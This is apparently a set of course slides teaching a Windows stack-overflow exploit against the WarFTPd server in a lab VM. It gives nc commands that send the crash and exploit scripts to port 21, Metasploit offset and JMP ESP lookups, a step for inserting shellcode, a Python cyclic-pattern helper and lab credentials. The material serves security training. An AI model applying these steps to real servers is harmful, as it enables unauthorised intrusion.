Strategic Security, Inc. © Exploit Development For Mere Mortals Part 4: Windows Stack Overflows Presented By: Joe McCray

Windows Stack Overflow Walk-Through

Let's Attack Windows

1. Power off the asterisk VM.
2. Extract and boot the XPIE8 VM (choose the first boot option; log in as Administrator:strategicsec).
3. Start WarFTPd.
4. Start WinDBG.
5. Press F6.
6. Attach to war-ftpd.exe.

Open warftpd1.py in Notepad++. From the XP host command prompt we will trigger a crash:

> python warftpd1.py | nc victim_ip 21

Let's Attack Windows

At the WinDBG prompt, type "r" (or press Alt+4) to show the registers. EIP should be … and ESP should be full of 41s.

In the WinDBG command prompt type:

dd eip
dd esp

Let's Attack Windows

1. Start WarFTPd.
2. Start WinDBG.
3. Press F6.
4. Attach to war-ftpd.exe.
5. At the WinDBG prompt press F5 to start the debugger. The debugger is now running.
6. Open warftpd2.py in Notepad++.

From your XP host command prompt, trigger the crash:

python warftpd2.py | nc victim_ip_addr 21

Let's Attack Windows

EIP: …
ESP: affd58

Now we need to SSH into the StrategicSec-Ubuntu host (strategicsec:strategicsec) and look the two values up in the cyclic pattern, then find a JMP ESP in a system DLL:

$ cd /home/strategicsec/toolz/metasploit/tools
$ ruby pattern_offset.rb
$ ruby pattern_offset.rb
$ cd /home/strategicsec/toolz/metasploit
$ ./msfpescan -j ESP DLLs/xpsp3/shell32.dll
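What pattern_offset.rb is doing with the EIP and ESP values above is easy to lose sight of when it is just a tool invocation, so here is the same calculation written out. This is an added example, not one of the course's warftpd*.py scripts and not Metasploit's own code: it rebuilds the Aa0Aa1Aa2… cyclic pattern that pattern_create.rb emits (the assumption here is that the course's warftpd2.py sent exactly that pattern) and then recovers the offset from either the 4-byte string seen in memory or the little-endian register value copied out of the debugger. The reverse helper, register_value_at, tells you which EIP value to expect for a given offset, which is a useful sanity check before trusting an offset.

```python
import struct

# Character sets used by Metasploit's pattern_create.rb scheme:
# every 3-byte group is Upper + lower + digit, rolling over like an odometer.
UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"
MAX_UNIQUE = len(UPPER) * len(LOWER) * len(DIGITS) * 3  # 20280 bytes


def pattern_create(length):
    """Build a cyclic pattern of `length` bytes (as a str).

    Any 4-byte window is unique within the first MAX_UNIQUE bytes, which is
    what lets a single register value be mapped back to one offset.
    """
    if length > MAX_UNIQUE:
        raise ValueError("pattern longer than %d bytes repeats" % MAX_UNIQUE)
    groups = []
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                groups.append(u + l + d)
                if len(groups) * 3 >= length:
                    return "".join(groups)[:length]
    return "".join(groups)[:length]


def _looks_like_hex_dword(value):
    digits = value[2:] if value.lower().startswith("0x") else value
    return len(digits) == 8 and all(c in "0123456789abcdefABCDEF" for c in digits)


def pattern_offset(pattern, value):
    """Return the byte offset of `value` inside `pattern`, or None.

    `value` is either the 4 characters seen in memory (e.g. "Aa3A") or the
    register value as shown by the debugger (e.g. "41336141" or
    "0x41336141"). A register value is decoded as a little-endian dword,
    the same convention pattern_offset.rb uses on x86.
    """
    idx = pattern.find(value)          # literal substring first
    if idx < 0 and _looks_like_hex_dword(value):
        digits = value[2:] if value.lower().startswith("0x") else value
        needle = struct.pack("<I", int(digits, 16)).decode("ascii", "replace")
        idx = pattern.find(needle)
    return None if idx < 0 else idx


def register_value_at(pattern, offset):
    """Return the x86 register value (as "0x........") that would be loaded
    from the 4 pattern bytes starting at `offset`; the inverse of
    pattern_offset, handy for checking an offset before using it."""
    chunk = pattern[offset:offset + 4].encode("ascii")
    if len(chunk) != 4:
        raise ValueError("offset %d is not 4 bytes inside the pattern" % offset)
    return "0x%08x" % struct.unpack("<I", chunk)[0]


if __name__ == "__main__":
    # Constructed demo: a 5000-byte pattern and a made-up crash value.
    pat = pattern_create(5000)
    crash_eip = "0x41336141"   # constructed, not a value from the course
    off = pattern_offset(pat, crash_eip)
    print("EIP %s sits at offset %s" % (crash_eip, off))
    print("expected EIP for offset %d: %s" % (off, register_value_at(pat, off)))
```

Feeding the value both ways (the 4-character string and the hex dword) is worth doing once: if the two disagree, you are reading the register in the wrong byte order or the overflow did not come from the pattern you think it did.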

Let's Attack Windows

1. Open warftpd3.py with Notepad++.
2. Fill in the appropriate values:
   - Distance to EIP
   - Address of JMP ESP
3. Open a command prompt on our host:

python warftpd3.py | nc victim_ip 21

Then, in WinDBG:

dd eip
dd esp

Let's Attack Windows

1. Open warftpd4.py in Notepad++.
2. Copy the shellcode into the 'shellcode' variable in warftpd4.py.
3. Run warftpd4.py:

> python warftpd4.py | nc victim_IP 21

Contact Me

Toll Free:
Twitter:
LinkedIn: